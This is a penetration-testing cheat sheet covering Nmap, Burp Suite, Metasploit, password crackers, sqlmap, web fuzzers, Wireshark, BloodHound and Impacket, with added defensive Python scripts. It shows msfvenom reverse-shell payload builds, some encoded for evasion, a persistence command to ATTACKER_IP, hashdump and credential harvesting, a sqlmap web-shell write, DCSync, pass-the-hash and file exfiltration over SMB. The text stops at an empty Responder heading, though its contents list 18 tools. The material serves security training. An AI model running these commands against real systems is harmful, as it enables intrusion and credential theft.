Tool Reference

Cheat sheets for the major tools used in ethical hacking and penetration testing. Each entry covers the tool's purpose, essential commands, common use cases, and practical tips.


Table of Contents

  1. Nmap
  2. Burp Suite
  3. Metasploit / msfconsole
  4. Hashcat
  5. John the Ripper
  6. sqlmap
  7. Gobuster / ffuf
  8. Nikto
  9. Wireshark / tshark
  10. BloodHound
  11. Impacket
  12. Responder
  13. CrackMapExec / NetExec
  14. Hydra
  15. enum4linux / enum4linux-ng
  16. LinPEAS / WinPEAS
  17. Chisel
  18. Ligolo-ng

1. Nmap

Purpose: Network discovery and security auditing. The most widely used port scanner and network reconnaissance tool.

Essential Scan Types

# Host discovery (ping sweep)
nmap -sn 192.168.1.0/24

# TCP SYN scan (default for root, fast and stealthy)
nmap -sS 192.168.1.10

# TCP connect scan (no root required)
nmap -sT 192.168.1.10

# UDP scan (slow but important)
nmap -sU 192.168.1.10

# Service version detection
nmap -sV 192.168.1.10

# OS detection
nmap -O 192.168.1.10

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A 192.168.1.10

# Default scripts
nmap -sC 192.168.1.10

# Combined: SYN scan + version + scripts
nmap -sS -sV -sC 192.168.1.10

Port Specification

# Specific ports
nmap -p 80,443,8080 TARGET

# Port range
nmap -p 1-1024 TARGET

# All ports
nmap -p- TARGET

# Top N ports
nmap --top-ports 100 TARGET

# Specific TCP and UDP ports
nmap -sS -sU -p T:80,443,U:53,161 TARGET

NSE (Nmap Scripting Engine)

# Run a specific script
nmap --script=http-enum TARGET

# Run multiple scripts
nmap --script=smb-vuln-ms17-010,smb-os-discovery TARGET

# Run script category
nmap --script=vuln TARGET

# Script with arguments
nmap --script=http-brute --script-args http-brute.path=/admin TARGET

# Useful script categories: auth, broadcast, brute, default,
#   discovery, dos, exploit, external, fuzzer, intrusive,
#   malware, safe, version, vuln

Output Options

# Normal output
nmap -oN scan.txt TARGET

# XML output (for parsing)
nmap -oX scan.xml TARGET

# Grepable output
nmap -oG scan.gnmap TARGET

# All formats
nmap -oA scan_results TARGET

Performance Tuning

# Timing templates (T0=paranoid to T5=insane)
nmap -T4 TARGET

# Min/max rate
nmap --min-rate 1000 TARGET

# Max retries
nmap --max-retries 1 TARGET

# Parallel host groups
nmap --min-hostgroup 64 TARGET

Tips

  • Always start with -sn for host discovery before full port scans
  • Use -p- (all ports) when thoroughness matters; many services hide on non-standard ports
  • Save XML output (-oX) for importing into other tools
  • --version-intensity tunes how many probes -sV sends (0 to 9, default 7): a value such as 5 is quicker, while 9 (or --version-all) is the most thorough
  • Combine -sS -sV -sC -O -p- for a comprehensive initial scan
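
The -oX output above is the format to build on when scans feed other tooling. The following added example (mine, not Nmap's code) parses two Nmap XML files into a host/port inventory and reports ports that are newly open relative to a baseline scan, which is how periodic scans become an exposure alert for the defender. Both XML documents are constructed to follow the nmaprun > host > ports > port layout, and the function names are my own.

```python
"""Inventory and diff of Nmap -oX output.

Added example for this reference, not Nmap's own code. The two XML
documents below are constructed to follow the layout of real -oX files
(nmaprun > host > status/address/ports > port > state/service).
"""
import xml.etree.ElementTree as ET

# Constructed baseline scan: 192.168.1.10 with SSH and HTTP open, 443 closed,
# and a second host that did not answer.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX baseline.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.11" addrtype="ipv4"/></host>
</nmaprun>"""

# Constructed later scan: HTTP is gone, MySQL and an alternate HTTP port
# appeared, and the previously silent host now answers on SMB.
CURRENT_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX current.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="8.0.33"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/>
        <service name="http-proxy"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.1.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return {ip: {(proto, port): service}} for open ports on hosts that are up."""
    inventory = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts that did not respond carry no exposure
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if addr is None:
            continue
        ports = inventory.setdefault(addr, {})
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not counted
            svc = port.find("service")
            fields = [] if svc is None else [
                svc.get("name"), svc.get("product"), svc.get("version")]
            key = (port.get("protocol"), int(port.get("portid")))
            ports[key] = " ".join(f for f in fields if f) or "unknown"
    return inventory


def diff_inventories(baseline, current):
    """Return (newly_open, newly_closed): sorted lists of (ip, proto, port, service)."""
    newly_open, newly_closed = [], []
    for ip in sorted(set(baseline) | set(current)):
        before, after = baseline.get(ip, {}), current.get(ip, {})
        newly_open += [(ip, p, n, after[(p, n)])
                       for p, n in sorted(set(after) - set(before))]
        newly_closed += [(ip, p, n, before[(p, n)])
                         for p, n in sorted(set(before) - set(after))]
    return newly_open, newly_closed


if __name__ == "__main__":
    opened, closed = diff_inventories(parse_nmap_xml(BASELINE_XML),
                                      parse_nmap_xml(CURRENT_XML))
    for ip, proto, port, svc in opened:
        print(f"NEW EXPOSURE   {ip} {proto}/{port} {svc}")
    for ip, proto, port, svc in closed:
        print(f"no longer open {ip} {proto}/{port} {svc}")
```

Replace the two string constants with the contents of real baseline and current -oX files to use it against your own scans.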

2. Burp Suite

Purpose: Integrated platform for web application security testing. Intercepts, modifies, and replays HTTP/HTTPS traffic.

Proxy Setup

Browser proxy: 127.0.0.1:8080
Install Burp CA cert: http://burpsuite (with proxy enabled)
Firefox recommended (supports per-browser proxy settings)

Key Modules

Module     Purpose                              Key Usage
Proxy      Intercept and modify requests        Toggle intercept on/off; forward/drop requests
Repeater   Manually modify and resend requests  Right-click request > "Send to Repeater"
Intruder   Automated customized attacks         Brute force, fuzzing, parameter enumeration
Scanner    Automated vulnerability scanning     Pro version only; passive + active scanning
Decoder    Encode/decode data                   Base64, URL, HTML, Hex encoding/decoding
Comparer   Compare responses                    Find differences between two responses
Sequencer  Analyze token randomness             Test session token entropy

Intruder Attack Types

Type           Description                                Use Case
Sniper         Single payload position, one at a time     Individual parameter fuzzing
Battering Ram  Same payload in all positions              Testing same value everywhere
Pitchfork      Different payload lists, matched by index  Username:password pairs
Cluster Bomb   All combinations of payload lists          Full credential brute force

Useful Shortcuts

Ctrl+R       Send to Repeater
Ctrl+I       Send to Intruder
Ctrl+Shift+T Toggle intercept
Ctrl+F       Forward intercepted request
Ctrl+D       Drop intercepted request

Tips

  • Configure scope early to filter noise (Target > Scope)
  • Use "Match and Replace" rules in Proxy settings to auto-modify requests
  • In Intruder, use "Grep - Extract" to pull specific data from responses
  • Enable "Passive scanning" (Pro) to find vulnerabilities as you browse
  • Export findings as HTML reports for documentation

3. Metasploit / msfconsole

Purpose: Exploitation framework providing exploit modules, payloads, encoders, and post-exploitation tools.

Core Commands

# Launch
msfconsole

# Search for modules
search type:exploit platform:windows smb
search cve:2021-44228

# Select and configure a module
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set LPORT 4444

# Run the exploit
exploit
# or
run

# Background a session
background
# or Ctrl+Z

# List active sessions
sessions -l

# Interact with a session
sessions -i 1

Module Types

Type       Path Prefix  Purpose
Exploits   exploit/     Code that triggers a vulnerability
Payloads   payload/     Code that runs after exploitation
Auxiliary  auxiliary/   Scanners, fuzzers, DoS modules
Post       post/        Post-exploitation modules
Encoders   encoder/     Payload encoding for evasion
Evasion    evasion/     AV evasion modules

Common Payloads

# Reverse TCP Meterpreter (most common)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Staged vs. Stageless
windows/meterpreter/reverse_tcp    # Staged (smaller, two parts)
windows/meterpreter_reverse_tcp    # Stageless (single, larger)

# Linux payloads
linux/x64/meterpreter/reverse_tcp
linux/x64/shell_reverse_tcp

# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp

Meterpreter Commands

# System info
sysinfo
getuid
getpid

# File operations
upload /local/path /remote/path
download /remote/path /local/path
cat /etc/shadow
ls
cd

# Privilege escalation
getsystem
run post/multi/recon/local_exploit_suggester

# Network
ipconfig / ifconfig
route
portfwd add -l 8080 -p 80 -r 10.0.0.5

# Credential harvesting
hashdump
run post/windows/gather/credentials/credential_collector
load kiwi    # Mimikatz
creds_all

# Persistence
run persistence -U -i 60 -p 4444 -r ATTACKER_IP

# Pivoting
run autoroute -s 10.0.0.0/24

Msfvenom (Payload Generation)

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php

# Python payload
msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.py

# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp

# War file (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war

# Shellcode (C format)
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f c

# With encoding for evasion
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -e x64/xor_dynamic -i 5 -f exe -o encoded.exe

Tips

  • Use db_nmap to import Nmap results directly into Metasploit's database
  • search accepts filters: type:, platform:, name:, cve:, rank:
  • Always set LHOST to your tun0/VPN interface IP for remote targets
  • Use exploit -j to run exploits as background jobs
  • The resource command runs script files for automation

4. Hashcat

Purpose: High-performance password recovery tool using GPU acceleration. Supports 300+ hash types.

Basic Usage

# Basic dictionary attack
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

# Show cracked passwords
hashcat -m 0 hashes.txt --show

# Output to file
hashcat -m 0 hashes.txt wordlist.txt -o cracked.txt

Common Hash Modes (-m)

Mode   Hash Type               Example
0      MD5                     5f4dcc3b5aa765d61d8327deb882cf99
100    SHA-1                   5baa61e4c9b93f3f...
1400   SHA-256                 5e884898da280471...
1000   NTLM                    a4f49c406510bdcab...
3200   bcrypt                  $2a$10$...
1800   sha512crypt             $6$...
500    md5crypt                $1$...
5600   NetNTLMv2               user::domain:...
13100  Kerberoast (TGS-REP)    $krb5tgs$23$...
18200  AS-REP Roast            $krb5asrep$23$...
1500   descrypt                48cMnSKCjxbfg
22000  WPA-PBKDF2-PMKID+EAPOL  .hc22000 file

Attack Modes (-a)

# Dictionary attack (default)
hashcat -m 1000 -a 0 hashes.txt wordlist.txt

# Combination attack (word1+word2)
hashcat -m 1000 -a 1 hashes.txt list1.txt list2.txt

# Brute force / mask attack
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?d?d?d?d
# ?l = lowercase, ?u = uppercase, ?d = digit
# ?s = special, ?a = all, ?b = binary

# Rule-based attack
hashcat -m 1000 -a 0 hashes.txt wordlist.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Hybrid: wordlist + mask
hashcat -m 1000 -a 6 hashes.txt wordlist.txt ?d?d?d?d
hashcat -m 1000 -a 7 hashes.txt ?d?d?d?d wordlist.txt
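
To reason about what a mask such as ?u?l?l?l?d?d?d?d actually costs, the following added example (mine, not hashcat's code) computes the keyspace of a mask from hashcat's built-in charset sizes, the candidate count for the hybrid modes -a 6 and -a 7, and the worst-case time at a given hash rate; read the other way round, it tells a defender whether a password policy whose shape matches a mask would survive an offline attack. The ?h/?H hex charsets are hashcat's but are not listed above; custom charsets (-1 to -4) are assumed out of scope.

```python
"""Keyspace arithmetic for hashcat mask (-a 3) and hybrid (-a 6 / -a 7) attacks.

Added example, not hashcat's own code. Charset sizes are hashcat's built-in
ones; custom charsets (-1 .. -4) are deliberately not handled here.
"""

# Built-in charsets: ?l ?u ?d ?s ?a ?b as listed in the reference, plus
# hashcat's hex charsets ?h / ?H.
CHARSET_SIZES = {
    "l": 26,   # abcdefghijklmnopqrstuvwxyz
    "u": 26,   # ABCDEFGHIJKLMNOPQRSTUVWXYZ
    "d": 10,   # 0123456789
    "h": 16,   # 0123456789abcdef
    "H": 16,   # 0123456789ABCDEF
    "s": 33,   # space plus the 32 printable ASCII punctuation characters
    "a": 95,   # ?l?u?d?s combined
    "b": 256,  # every byte value 0x00-0xff
}


def parse_mask(mask):
    """Return the candidate count for each position of a hashcat mask.

    '?x' selects a built-in charset, '??' is a literal question mark, and any
    other character is a fixed literal (exactly one candidate at that position).
    """
    sizes = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sel = mask[i + 1]
        if sel == "?":
            sizes.append(1)
        elif sel in CHARSET_SIZES:
            sizes.append(CHARSET_SIZES[sel])
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2
    return sizes


def mask_keyspace(mask):
    """Number of candidates a pure mask attack (-a 3) has to try."""
    total = 1
    for n in parse_mask(mask):
        total *= n
    return total


def hybrid_keyspace(wordlist_entries, mask):
    """Candidates for -a 6 (word+mask) or -a 7 (mask+word): every wordlist
    entry is paired with every expansion of the mask."""
    return wordlist_entries * mask_keyspace(mask)


def hours_to_exhaust(candidates, hashes_per_second):
    """Worst-case hours to try every candidate at the given cracking rate."""
    if hashes_per_second <= 0:
        raise ValueError("rate must be positive")
    return candidates / hashes_per_second / 3600


def exhaustible_within(mask, hashes_per_second, max_hours=24 * 7):
    """True if the whole keyspace of the mask falls within max_hours at that rate.

    A password policy whose shape matches a mask for which this returns True
    is not protecting anything against an offline attack on that hash type.
    """
    return hours_to_exhaust(mask_keyspace(mask), hashes_per_second) <= max_hours


if __name__ == "__main__":
    # Rate is a placeholder; take the real figure from hashcat -b for your hash mode.
    rate = 1e9
    for m in ("?u?l?l?l?d?d?d?d", "Summer?d?d?d?d", "?a?a?a?a?a?a?a?a?a?a"):
        print(f"{m:<24} keyspace={mask_keyspace(m):>24,}  "
              f"hours@{rate:.0e}/s={hours_to_exhaust(mask_keyspace(m), rate):.2e}")
```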

Tips

  • Always use --potfile-disable in CTF/exam scenarios to avoid caching issues
  • Use -O (optimized kernels) for faster cracking on supported hash types
  • Use -w 3 (high workload profile) for more throughput; the desktop may become unresponsive while it runs
  • The --username flag handles hash files with user:hash format
  • Check hashcat --example-hashes to identify unknown hash types

5. John the Ripper

Purpose: Open-source password cracker supporting many hash and cipher types. CPU-based with broad format support.

Basic Usage

# Auto-detect hash type and crack
john hashes.txt

# Specify format
john --format=raw-md5 hashes.txt

# Use specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Show cracked for specific format
john --show --format=raw-md5 hashes.txt

Hash Extraction Tools (john suite)

# Extract hashes from various file types
zip2john protected.zip > zip_hash.txt
rar2john protected.rar > rar_hash.txt
pdf2john protected.pdf > pdf_hash.txt
ssh2john id_rsa > ssh_hash.txt
keepass2john database.kdbx > keepass_hash.txt
office2john document.docx > office_hash.txt
gpg2john private.gpg > gpg_hash.txt
bitlocker2john image.dd > bitlocker_hash.txt

# Then crack
john --wordlist=rockyou.txt zip_hash.txt

Rules and Modes

# Single crack mode (uses username mangling)
john --single hashes.txt

# Incremental (brute force)
john --incremental hashes.txt

# Rules
john --wordlist=wordlist.txt --rules=best64 hashes.txt
john --wordlist=wordlist.txt --rules=KoreLogic hashes.txt

# Custom rules (in john.conf)
# [List.Rules:MyRules]
# Az"[0-9][0-9]"    # Append 2 digits
# c                   # Capitalize first letter
# $[!@#$%]           # Append special char

Tips

  • John auto-detects most hash formats, but explicit --format is more reliable
  • Use john --list=formats to see all supported formats
  • The .pot file (~/.john/john.pot) stores all cracked hashes persistently
  • unshadow /etc/passwd /etc/shadow > combined.txt merges Linux credential files
  • John complements Hashcat: use John for CPU cracking and file formats, Hashcat for GPU speed

6. sqlmap

Purpose: Automated SQL injection detection and exploitation tool.

Basic Usage

# Test a URL parameter
sqlmap -u "http://target.com/page?id=1"

# Test POST parameter
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Specify parameter to test
sqlmap -u "http://target.com/page?id=1&cat=5" -p id

# Use a request file (from Burp Suite: right-click > Save item)
sqlmap -r request.txt

Enumeration

# Get current database
sqlmap -u URL --current-db

# List all databases
sqlmap -u URL --dbs

# List tables in a database
sqlmap -u URL -D database_name --tables

# Dump specific table
sqlmap -u URL -D database_name -T users --dump

# Dump specific columns
sqlmap -u URL -D database_name -T users -C username,password --dump

# Get current user
sqlmap -u URL --current-user

# Check if DBA
sqlmap -u URL --is-dba

# List all users and passwords
sqlmap -u URL --passwords

Advanced Options

# Specify DBMS
sqlmap -u URL --dbms=mysql

# Specify injection technique
# B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline
sqlmap -u URL --technique=BEU

# OS shell (if DBA and stacked queries)
sqlmap -u URL --os-shell

# SQL shell
sqlmap -u URL --sql-shell

# File read/write
sqlmap -u URL --file-read="/etc/passwd"
sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# WAF bypass
sqlmap -u URL --tamper=space2comment,between

# Increase level and risk
sqlmap -u URL --level=5 --risk=3

# Use cookies / authentication
sqlmap -u URL --cookie="PHPSESSID=abc123"
sqlmap -u URL --headers="Authorization: Bearer TOKEN"

# Batch mode (auto-answer yes)
sqlmap -u URL --batch

Tips

  • Start with --batch --smart for quick initial assessment
  • Save request from Burp Suite (-r request.txt) for complex requests with cookies/headers
  • Use --level=5 --risk=3 when initial tests find nothing but you suspect SQLi
  • Use --tamper scripts to bypass WAFs (list with sqlmap --list-tampers)
  • The --wizard flag provides interactive guidance for beginners

7. Gobuster / ffuf

Purpose: Directory and file brute forcing on web servers. ffuf also supports fuzzing parameters, headers, and virtual hosts.

Gobuster

# Directory brute force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# With file extensions
gobuster dir -u http://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -x php,html,txt,bak

# Filter by status code
gobuster dir -u http://target.com -w wordlist.txt \
  -s "200,204,301,302,307"

# Increase threads
gobuster dir -u http://target.com -w wordlist.txt -t 50

# With authentication
gobuster dir -u http://target.com -w wordlist.txt \
  -U admin -P password

# DNS subdomain enumeration
gobuster dns -d target.com -w subdomains.txt

# Virtual host enumeration
gobuster vhost -u http://target.com -w wordlist.txt

ffuf (Fuzz Faster U Fool)

# Directory fuzzing (FUZZ keyword marks injection point)
ffuf -u http://target.com/FUZZ -w wordlist.txt

# With extensions
ffuf -u http://target.com/FUZZ \
  -w wordlist.txt \
  -e .php,.html,.txt,.bak

# Filter by status code
ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 404

# Filter by response size
ffuf -u http://target.com/FUZZ -w wordlist.txt -fs 1234

# Filter by word count
ffuf -u http://target.com/FUZZ -w wordlist.txt -fw 42

# Virtual host fuzzing
ffuf -u http://target.com -H "Host: FUZZ.target.com" \
  -w subdomains.txt -fs 1234

# POST parameter fuzzing
ffuf -u http://target.com/login \
  -X POST -d "user=admin&pass=FUZZ" \
  -w passwords.txt -fc 401

# Multi-keyword fuzzing (e.g., username:password)
ffuf -u http://target.com/login \
  -X POST -d "user=USER&pass=PASS" \
  -w users.txt:USER -w passwords.txt:PASS \
  -fc 401

# Recursive scanning
ffuf -u http://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2

# With cookies
ffuf -u http://target.com/FUZZ -w wordlist.txt -b "session=abc123"

# Output to file
ffuf -u http://target.com/FUZZ -w wordlist.txt -o results.json -of json

Tips

  • ffuf is generally faster and more flexible than Gobuster for web fuzzing
  • Use SecLists wordlists: /usr/share/seclists/Discovery/Web-Content/
  • Always filter results (-fc, -fs, -fw) to remove noise
  • For virtual host fuzzing, first find the default response size and filter it out
  • Use -rate flag in ffuf to limit requests per second and avoid detection

8. Nikto

Purpose: Open-source web server scanner that checks for dangerous files, outdated software, and misconfigurations.

Basic Usage

# Basic scan
nikto -h http://target.com

# Scan specific port
nikto -h target.com -p 8080

# Multiple ports
nikto -h target.com -p 80,443,8080

# Save output
nikto -h target.com -o report.html -Format html

# SSL scan
nikto -h https://target.com -ssl

# Use proxy (Burp)
nikto -h target.com -useproxy http://127.0.0.1:8080

# Specific tuning (test types)
nikto -h target.com -Tuning 1234
# 1=Interesting files, 2=Misconfiguration/default files, 3=Information disclosure,
# 4=Injection (XSS/Script/HTML), 5=Remote file retrieval (inside web root), 6=DoS,
# 7=Remote file retrieval (server-wide), 8=Command execution/remote shell,
# 9=SQL injection, 0=File upload

Tips

  • Nikto is noisy and easily detected; use it for initial reconnaissance, not stealth
  • Combine with Nmap service detection to target specific web servers
  • Update signatures before scanning: nikto -update
  • Use -Cgidirs all to scan all CGI directories

9. Wireshark / tshark

Purpose: Network protocol analyzer for capturing and interactively displaying network traffic at the packet level.

Wireshark Display Filters

# Filter by IP
ip.addr == 192.168.1.10
ip.src == 192.168.1.10
ip.dst == 10.0.0.1

# Filter by protocol
tcp
udp
http
dns
smb
ftp

# Filter by port
tcp.port == 80
tcp.dstport == 443
udp.port == 53

# HTTP filters
http.request.method == "POST"
http.request.uri contains "login"
http.response.code == 200
http.host == "target.com"

# TCP flags
tcp.flags.syn == 1
tcp.flags.reset == 1
tcp.flags.fin == 1

# String search in packets
frame contains "password"
tcp contains "admin"

# Follow TCP stream
Right-click packet > Follow > TCP Stream

# Credentials in cleartext
ftp.request.command == "PASS"
http.authbasic
smtp.req.parameter contains "@"

tshark (Command-line Wireshark)

# Capture packets
tshark -i eth0 -w capture.pcap

# Read capture file
tshark -r capture.pcap

# Filter while capturing
tshark -i eth0 -f "tcp port 80" -w http_traffic.pcap

# Display filter on existing capture
tshark -r capture.pcap -Y 'http.request.method == "POST"'

# Extract specific fields
tshark -r capture.pcap -Y "http" \
  -T fields -e ip.src -e http.host -e http.request.uri

# Extract HTTP objects (files)
tshark -r capture.pcap --export-objects http,exported_files/

# Statistics
tshark -r capture.pcap -z conv,tcp
tshark -r capture.pcap -z io,stat,1

# Credential extraction
tshark -r capture.pcap -Y 'ftp.request.command == "PASS"' \
  -T fields -e ftp.request.arg
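
Seen from the defender's side, the credential extraction above is a cleartext-authentication audit. The following added example (mine, not part of tshark) reads the tab-separated text that an assumed tshark -T fields invocation writes, reports which clients still authenticate to which servers over FTP or HTTP Basic/Bearer, and deliberately discards the passwords themselves. The sample lines are constructed; addresses and credentials are made up.

```python
"""Cleartext-authentication audit over tshark -T fields output.

Added example for this reference, not part of tshark. It reads the
tab-separated text that this (assumed) invocation writes to stdout:
  tshark -r capture.pcap -T fields -e frame.time_epoch -e ip.src -e ip.dst \
    -e tcp.dstport -e ftp.request.command -e ftp.request.arg -e http.authorization
The sample below is constructed; every address and credential is made up.
"""
import base64
from collections import Counter

FIELD_NAMES = ["time", "src", "dst", "dport", "ftp_cmd", "ftp_arg", "http_auth"]


def _basic(user, password):
    """HTTP Basic header value, used only to build the constructed sample."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


SAMPLE_FIELDS = "\n".join("\t".join(row) for row in [
    ["1700000000.10", "10.0.0.15", "10.0.0.5", "21", "USER", "ftpadmin", ""],
    ["1700000000.20", "10.0.0.15", "10.0.0.5", "21", "PASS", "Winter2024!", ""],
    ["1700000001.30", "10.0.0.22", "10.0.0.9", "80", "", "", _basic("alice", "hunter2")],
    ["1700000002.40", "10.0.0.15", "10.0.0.9", "80", "", "", _basic("bob", "s3cret")],
    ["1700000003.50", "10.0.0.31", "10.0.0.9", "443", "", "", ""],  # TLS: nothing visible
    ["1700000004.60", "10.0.0.22", "10.0.0.9", "80", "", "", "Bearer tok3n-redacted"],
])


def parse_tshark_fields(text):
    """Yield one dict per line; tshark leaves a field empty when it is absent."""
    for line in text.splitlines():
        if not line.strip():
            continue
        values = line.split("\t")
        values += [""] * (len(FIELD_NAMES) - len(values))  # tolerate trimmed trailing tabs
        yield dict(zip(FIELD_NAMES, values))


def find_cleartext_auth(text):
    """Return findings as (time, client, server, protocol, username).

    Passwords are never returned: the audit is about which clients still
    authenticate in the clear to which servers, not about what was typed.
    """
    findings = []
    last_ftp_user = {}  # (client, server) -> username seen in the USER command
    for rec in parse_tshark_fields(text):
        key = (rec["src"], rec["dst"])
        if rec["ftp_cmd"] == "USER":
            last_ftp_user[key] = rec["ftp_arg"]
        elif rec["ftp_cmd"] == "PASS":
            findings.append((rec["time"], rec["src"], rec["dst"], "ftp",
                             last_ftp_user.get(key, "?")))
        elif rec["http_auth"]:
            scheme, _, value = rec["http_auth"].partition(" ")
            user = "-"  # non-Basic schemes carry no username we can name
            if scheme == "Basic":
                try:
                    user = base64.b64decode(value).decode(errors="replace").split(":", 1)[0]
                except ValueError:  # malformed base64 (binascii.Error is a ValueError)
                    user = "?"
            findings.append((rec["time"], rec["src"], rec["dst"],
                             "http-" + scheme.lower(), user))
    return findings


def clients_by_exposure(findings):
    """Count cleartext logins per client address: who to fix first."""
    return Counter(client for _, client, _, _, _ in findings)


if __name__ == "__main__":
    found = find_cleartext_auth(SAMPLE_FIELDS)
    for t, client, server, proto, user in found:
        print(f"{t}  {client} -> {server}  {proto:<11} user={user}")
    print(clients_by_exposure(found))
```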

Tips

  • Use capture filters (-f) to limit what is recorded and display filters (-Y) to search existing captures
  • "Follow TCP Stream" is the fastest way to reconstruct a conversation
  • Export HTTP objects (File > Export Objects > HTTP) to extract transferred files
  • Use Statistics > Conversations to identify the most active connections
  • Statistics > Protocol Hierarchy gives a quick overview of traffic composition

10. BloodHound

Purpose: Active Directory attack path mapping tool using graph theory to reveal relationships and privilege escalation paths.

Data Collection (SharpHound)

# PowerShell collector
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp

# Executable collector
.\SharpHound.exe -c All --outputdirectory C:\temp

# Collection methods: Default, Group, LocalAdmin, Session,
#   Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets,
#   PSRemote, All

# Stealthy collection (slower, less noise)
.\SharpHound.exe -c DCOnly

# From Linux (bloodhound-python)
bloodhound-python -u 'user' -p 'password' -d domain.local \
  -ns 192.168.1.1 -c All

Key Queries in BloodHound GUI

# Pre-built queries (Analysis tab):
- Find all Domain Admins
- Shortest Paths to Domain Admins from Owned Principals
- Find Computers where Domain Users are Local Admin
- Shortest Paths to High Value Targets
- Find All Kerberoastable Users
- Find All AS-REP Roastable Users
- Shortest Paths from Owned Principals

# Custom Cypher queries:
# Find users with DCSync rights
MATCH (n:User)-[:MemberOf*1..]->(g:Group)-[:DCSync|GetChanges|GetChangesAll]->(d:Domain)
RETURN n.name, g.name

# Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true})
RETURN c.name

Tips

  • Mark owned users/computers in the GUI to highlight available attack paths
  • Focus on "Shortest Paths to Domain Admins" after obtaining initial credentials
  • Run SharpHound from an authenticated user context for best results
  • Re-collect data periodically as sessions and group memberships change
  • Use the "Node Info" panel to see detailed properties and group memberships

11. Impacket

Purpose: Collection of Python tools for working with network protocols, focused on Windows/Active Directory penetration testing.

Key Tools

# Remote command execution
psexec.py domain/user:password@target
smbexec.py domain/user:password@target
wmiexec.py domain/user:password@target
atexec.py domain/user:password@target "whoami"
dcomexec.py domain/user:password@target

# Pass-the-hash
psexec.py -hashes :NTLM_HASH domain/user@target
wmiexec.py -hashes LM:NTLM domain/user@target

# Hash dumping
secretsdump.py domain/user:password@target
secretsdump.py -just-dc domain/user:password@DC_IP  # DCSync

# Kerberos attacks
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request  # Kerberoast
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP    # AS-REP Roast

# SMB operations
smbclient.py domain/user:password@target
smbserver.py SHARE /path/to/share  # Start SMB server

# Ticket operations
getTGT.py domain/user:password -dc-ip DC_IP
getST.py -spn MSSQLSvc/sql.domain.local domain/user -dc-ip DC_IP
ticketConverter.py ticket.kirbi ticket.ccache

# NTLM relay
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldap://DC_IP --delegate-access

# MSSql client
mssqlclient.py domain/user:password@target -windows-auth

Tips

  • Use -k flag for Kerberos authentication when you have tickets
  • Set KRB5CCNAME environment variable to point to your .ccache file
  • secretsdump.py with -just-dc-ntlm is faster when you only need NTLM hashes
  • smbserver.py is invaluable for exfiltrating files from compromised Windows hosts
  • When psexec fails, try wmiexec or smbexec as alternatives

12. Responder

